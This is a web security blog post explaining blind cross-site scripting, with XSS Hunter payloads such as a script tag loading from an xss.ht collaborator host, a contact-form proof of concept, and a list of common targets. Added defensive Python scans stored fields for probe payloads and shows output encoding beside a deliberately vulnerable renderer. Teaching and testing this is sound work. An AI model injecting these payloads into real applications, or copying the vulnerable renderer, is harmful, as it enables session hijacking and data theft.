Blind Cross Site Scripting
Hello Friends!
This is my 31st blog on web application security penetration testing. In this blog I will explain Blind Cross Site Scripting.
In my last blog I explained DOM Based Cross Site Scripting. I hope everyone liked it; if you haven’t read it yet, please follow along.
What is Blind XSS?
It is a type of stored XSS where the attacker's input is saved by the server and is rendered in a totally different application, one used by a system admin or team member, rather than in the page where it was submitted.
How to Test for Blind XSS?
1. Sign up on XSS Hunter: https://xsshunter.com/
2. Upon signing up you will create a special xss.ht short domain, such as yoursubdomain.xss.ht, which identifies your XSS vulnerabilities and hosts your payload.
3. You then use this subdomain in your XSS testing, with injection attempts such as "><script src=//yoursubdomain.xss.ht></script>. XSS Hunter will automatically serve up XSS probes and collect the resulting information when they fire.
4. In my case it is "><script src=https://testmaddy.xss.ht></script> (note the straight double quote; a curly quote will not break out of an attribute). When you inject this script into any website, XSS Hunter will automatically probe that website for all kinds of XSS and send a report to your XSS Hunter account.
5. Attack vectors include search query parameters, stored data fields, contact/feedback pages, chat applications, email applications, etc.
Blind XSS Testing Tools:
1. XSS Hunter
2. KNOXSS
3. Burp Collaborator
4. bXSS
I am using XSS Hunter for testing blind XSS. Below is the step-by-step POC:
To honor confidentiality, let’s refer to the domain as redacted.com.
1. I navigated to the Contact Us form, entered the Blind XSS payload in the Name field and submitted the web form.
2. Navigate to the XSS Hunter app; in the Payloads section you will find the full list of payloads, which can be used in the different contexts of a web page.
3. Some days after submitting the blind XSS payload in the Name field, I received an email notification stating that the XSS payload had fired on a web page, along with details of the vulnerable domain where I had submitted the payload.
Payload used: "><script src=https://myusername.xss.ht></script>
4. I immediately logged in to the XSS Hunter application, and the same information I had received via email was present in the “XSS Fires” section.
I have tested this on many applications and received XSS fire notifications many times.
Impact:
Many different attacks can be leveraged through the use of cross-site scripting, including:
Hijacking user’s active session.
Mounting phishing attacks.
Intercepting data and performing man-in-the-middle attacks.
Some Common Targets for Blind XSS:
Contact/Feedback pages
Log viewers
Exception handlers
Chat applications / forums
Customer ticket applications
Web Application Firewalls
Any application that requires user moderation
Customer service applications
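The targets listed above all have one thing in common: free-text input is stored and later opened in an internal tool. As an added defensive example (not part of the original post), here is a triage check a security team can run over those stored fields to learn that a blind XSS probe was stored before an admin's browser learns it by executing the payload. The field names, the sample records and the probe-domain list are constructed; xss.ht is the collaborator domain from the post, and the list is meant to be extended with whatever out-of-band services your team tracks.

```python
# Added example, not from the original post: scan stored free-text fields
# (contact forms, tickets, chat messages) for blind XSS probe payloads.
# Sample records, field names and the domain list are constructed.
import re
from typing import Iterable, Iterator, List, Optional, Tuple
from urllib.parse import urlparse

# Collaborator domains that host probe payloads. xss.ht is from the post;
# extend this with the out-of-band services your team uses (assumption).
PROBE_DOMAINS = ("xss.ht",)

# <script ... src=URL ...>, with or without quotes around the URL.
SCRIPT_SRC = re.compile(r"<\s*script[^>]*\bsrc\s*=\s*['\"]?([^'\" >]+)", re.I)

# Generic markers of script injection: a <script tag or an on*= handler.
INJECTION_MARKER = re.compile(r"<\s*script|\bon\w+\s*=", re.I)


def external_script_hosts(value: str) -> List[str]:
    """Return the hosts referenced by every <script src=...> in the value."""
    hosts = []
    for url in SCRIPT_SRC.findall(value):
        # Scheme-relative "//host" is common in probe payloads (see the post);
        # give it a scheme so urlparse can extract the host.
        if url.startswith("//"):
            url = "https:" + url
        hostname = urlparse(url).hostname
        if hostname:
            hosts.append(hostname)
    return hosts


def classify(value: str) -> Optional[str]:
    """Label a stored value:
    'probe'      - script source on a known collaborator domain
    'suspicious' - injection markers without a known collaborator domain
    None         - nothing found
    """
    hosts = external_script_hosts(value)
    if any(h == d or h.endswith("." + d) for h in hosts for d in PROBE_DOMAINS):
        return "probe"
    if hosts or INJECTION_MARKER.search(value):
        return "suspicious"
    return None


def scan_records(records: Iterable[dict]) -> Iterator[Tuple[int, str, str]]:
    """Yield (record_id, field, label) for every flagged text field."""
    for rec in records:
        for field, value in rec.items():
            if field == "id":
                continue
            label = classify(value)
            if label:
                yield rec["id"], field, label


# Constructed sample contact-form submissions, as an internal tool would read
# them from the database. Record 4 is a benign false positive on purpose.
SAMPLE_RECORDS = [
    {"id": 1, "name": "Alice Example", "message": "Please call me back."},
    {"id": 2, "name": '"><script src=https://yoursubdomain.xss.ht></script>',
     "message": "test"},
    {"id": 3, "name": "Bob", "message": "<img src=x onerror=alert(1)>"},
    {"id": 4, "name": "Carol", "message": "Use <script> tags? I am not sure."},
]

if __name__ == "__main__":
    for rec_id, field, label in scan_records(SAMPLE_RECORDS):
        print(f"record {rec_id} field {field!r}: {label}")
```

Treat the output as a signal for triage, not as a control: pattern matching on stored text is easy to evade with encoding and obfuscation, so it complements output encoding in the internal application rather than replacing it. The deliberate hit on record 4 shows why a human should look at "suspicious" results before anything is blocked.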
Recommendation:
Like the offensive side, the defensive side is also very important in security.
So here are some defensive measures, or prevention steps, to protect your web application from Blind XSS. The most common and effective way to accomplish this is for web developers to review the code and ensure that any user input is properly filtered.
You also need a specialized tool that performs innocuous penetration testing and goes beyond detecting the easy-to-detect XSS vulnerabilities.
Even if your website is implemented using the latest technology such as HTML5, and you ensure that your web server is fully patched, the web application may still be vulnerable to XSS.
It is good coding practice to never trust data provided by the user.
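Filtering at the input boundary is necessary but is not what ultimately stops a blind XSS payload, because the payload fires in a different application than the one that accepted it. The control that protects every consumer of the stored value is output encoding for the HTML context in which the value is rendered. The following is an added example (not code from the post or from XSS Hunter) showing an internal admin view that renders stored contact-form rows; the vulnerable renderer is kept beside the hardened one for contrast. The function names, the row layout and the sample submission are constructed, and the collaborator subdomain is the yoursubdomain.xss.ht placeholder from the post.

```python
# Added example, not from the original post: rendering stored contact-form
# submissions in an internal admin view, i.e. the "different application"
# where a blind XSS payload fires. Names and sample data are constructed.
import html

# Constructed sample: the Name field exactly as stored by the contact form,
# in the payload format from the post (collaborator subdomain is a placeholder).
STORED_NAME = '"><script src=https://yoursubdomain.xss.ht></script>'


def render_row_vulnerable(name: str, message: str) -> str:
    """Admin ticket row built by string interpolation: untrusted data goes
    straight into HTML, so a stored payload executes when an admin opens the
    ticket queue. This is the defect, kept only for contrast."""
    return f'<tr><td title="{name}">{name}</td><td>{message}</td></tr>'


def escape_attr(value: str) -> str:
    """Attribute context: escape &, <, >, " and ' so the value cannot close
    the quoted attribute or the tag (this is what the leading "> relies on)."""
    return html.escape(value, quote=True)


def escape_text(value: str) -> str:
    """Element text context: escaping &, < and > is what stops tag injection;
    quotes are escaped as well, which is harmless here."""
    return html.escape(value, quote=True)


def render_row_hardened(name: str, message: str) -> str:
    """Same row with context-aware output encoding applied at render time.
    Encoding on output, rather than trusting that input was filtered, protects
    every tool that reads the stored value, including ones written later."""
    return (
        f'<tr><td title="{escape_attr(name)}">{escape_text(name)}</td>'
        f'<td>{escape_text(message)}</td></tr>'
    )


def contains_live_script(rendered: str) -> bool:
    """Crude check used only by this example: is an unescaped <script tag
    still present in the rendered HTML?"""
    return "<script" in rendered


if __name__ == "__main__":
    vuln = render_row_vulnerable(STORED_NAME, "please call me back")
    safe = render_row_hardened(STORED_NAME, "please call me back")
    print("vulnerable:", vuln)
    print("hardened:  ", safe)
    print("script survives in vulnerable:", contains_live_script(vuln))
    print("script survives in hardened:  ", contains_live_script(safe))
```

Note that the same stored value needs different handling depending on where it lands: a value placed inside a JavaScript string, a URL or a CSS block requires the encoder for that context, not HTML entity escaping. Template engines that auto-escape by default give you the hardened behaviour without remembering to call the escaper on every field.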
References:
1. POC Reference: https://hackerone.com/reports/275518
2. Other References: https://hackerone.com/reports/314126 and https://mhmdiaa.github.io/blind-xss-in-spotify/
3. Best Resource: https://brutelogic.com.br/blog/blind-xss-code/
I hope everyone likes it, and if you face any difficulty please let me know via a comment.
Please do like and follow for more reads!
Thanks!